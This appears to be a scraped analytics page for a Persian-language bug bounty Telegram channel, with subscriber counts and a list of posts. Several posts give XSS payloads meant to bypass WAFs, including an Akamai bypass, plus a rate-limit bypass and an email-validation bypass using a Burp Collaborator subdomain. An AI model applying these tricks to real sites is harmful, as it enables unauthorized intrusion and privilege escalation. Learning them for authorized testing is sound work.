464
订阅者
无数据24 小时
无数据7 天
无数据30 天
数据加载中...
吸引订阅者
六月 '25
六月 '25
+152
在1个频道中
五月 '250
在0个频道中
Get PRO
四月 '25
+38
在0个频道中
Get PRO
三月 '250
在0个频道中
Get PRO
二月 '25
+93
在0个频道中
Get PRO
一月 '250
在1个频道中
Get PRO
十二月 '24
+15
在1个频道中
Get PRO
十一月 '240
在0个频道中
Get PRO
十月 '240
在0个频道中
Get PRO
九月 '24
+1
在1个频道中
Get PRO
八月 '240
在0个频道中
Get PRO
七月 '24
+26
在0个频道中
Get PRO
六月 '240
在0个频道中
Get PRO
五月 '240
在0个频道中
Get PRO
四月 '24
+14
在0个频道中
Get PRO
三月 '240
在0个频道中
Get PRO
二月 '24
+127
在0个频道中
频道帖子
| 2 | +7 0-CourseIntro.pdf | 144 |
| 3 | +2 android_kernel.pdf | 217 |
| 4 | ریسورس های خوبیه
استفاده کنیدش | 309 |
| 5 | +4 android_part1.pdf | 349 |
| 6 | سایت https://pocorexp.nsa.im/ همهی CVEها رو فهرست کرده و اگر برای هرکدوم اکسپلویت پابلیک وجود داشته باشه، اون رو هم پایینش قرار میده. | 172 |
| 7 | <42 foo="<img src=x onerror=alert(1)//">test</42> | 338 |
| 8 | 没有文字... | 326 |
| 9 | <22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers | 269 |
| 10 | جاهایی که rate limit روی شماره کار میکنه، میتونیم با اضافه کردن + به +98 بایپسش کنیم.
#rate_limit_bypass | 279 |
| 11 | Iframe attacks:
https://castbox.fm/vb/798626958 | 505 |
| 12 | Mac os inside docker:
https://github.com/dockur/macos | 519 |
| 13 | Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
@GitBook_s | 570 |
| 14 | رضا یکی از خفن ترین و بهترین استاداییه که من داشتم.
بشدت کارش خفنه.
اگه تونستید حتما شرکت بکنید | 671 |
| 15 | توضیحات ثبت نام منتورینگ که درواقع نقشه راه این دوره است:
منتورینگ شامل ۴۰۰ ساعت ویدیو ضبط شده است که شامل یک سری دوره های مخصوص منتورینگ و یکی سری دوره های من در طول مدت کوچینگ مادام العمر خواهد بود(البته در صورت انجام رفتار خلاف قوانین مثل نشر ویدیو یا همکاری با تیم ها و جاهای دیگر که باعث شک در نقض محرمانگی شود میتواند باعث ریموو شدن کاربر گردد دلیل این موضوع مشکل است: در لایو هانت های منتورینگ سناریو های پیشرفته و متفاوت روی تارگت های باگ بانتی انجام میپذیرد).
پرسش و پاسخ، لایو هکینگ و لایو های دائم هفتگی و ماهانه به همراه اپدیت و اپگرید کامل دوره ها که به صورت رایگان در طول زمان کوچینگ اختیار دانشجویان قرارمیگیرد، در منتورینگ هردانشجو میتواند در طول روز سوالاتاش را مستقیم از شخص مدرس بپرسد یا از گروه های مربوط به منتورینگ استفاده کند
مواردی که تا اینجا تکمیل شده در منتورینگ
بخش اینترو و استارت پن تست وب اپلیکیشن، api, دیتابیس ها sql & nos l
برنامه نویسی جی اس (client side & server side)و مطالب پایه وب هکینگ
مطالبسطح متوسط و اکسپرت وب هکینگ که به حملات api ها نیز پرداخته شده است
باگ بانتی و خودکار سازی حملات
اکسپلویت نویسی با پایتون
سرویس هانتینگ
موارد در حال تکمیل
RedTeam
تمامی موارد از پیشنیاز اغاز میشود تا سطح
پیشرفته
تمام سطوح هرچند یکبار بسته به نیاز و تغییرات، اپدیت و اپگرید خواند شد
تمام پشتیبانی دانشجویان توسط خود من انجام میگردد
برای ثبت نام:
Page instagram: PentesterLand پیام دهید | 457 |
| 16 | اینجا برای اینکه امکان ثبت نام در سامانه میسر باشه باید با یکی از ایمیل های معتبری که قبلا تعریف شده ثبت نام انجام بشه مثل:
example@immuniweb.com
همونجور که میدونید Burp Collaborator امکان دریافت SMTP Connection رو هم داره.
پس ما میتونیم با قرار دادن دامین مورد نظر در سابدامین Collaborator خودمون این Validation رو بایپس کنیم:
example@immuniweb.com.Collaborator.com
به همین سادگی امکان دور زدن این مکانیزم وجود داره،
نکته ایی که مهمه اینه شما میتونید در جاهای متنوعی مخصوصا جاهایی Role های مختلف و سطح دسترسی های مختلفی داره ثبت نام رو انجام بدید ممکنه اگر با ایمیل معتبر سازمان ثبت نام کنید، ممکنه به صورت پیشفرض دسترسی سطح بالاتری بهتون اختصاص داده بشه.
#bugbounty
#challange
#bugbountytips
#testcase | 360 |
| 17 | https://github.com/m14r41/PentestingEverything | 477 |
| 18 | amazing nginx root me challange:
https://www.root-me.org/en/Challenges/Web-Server/Nginx-Root-Location-Misconfiguration | 385 |
| 19 | https://thecyberneh.github.io/posts/MicrosoftBugbounty/ | 470 |
| 20 | https://blog.pspaul.de/posts/bench-press-leaking-text-nodes-with-css/ | 443 |
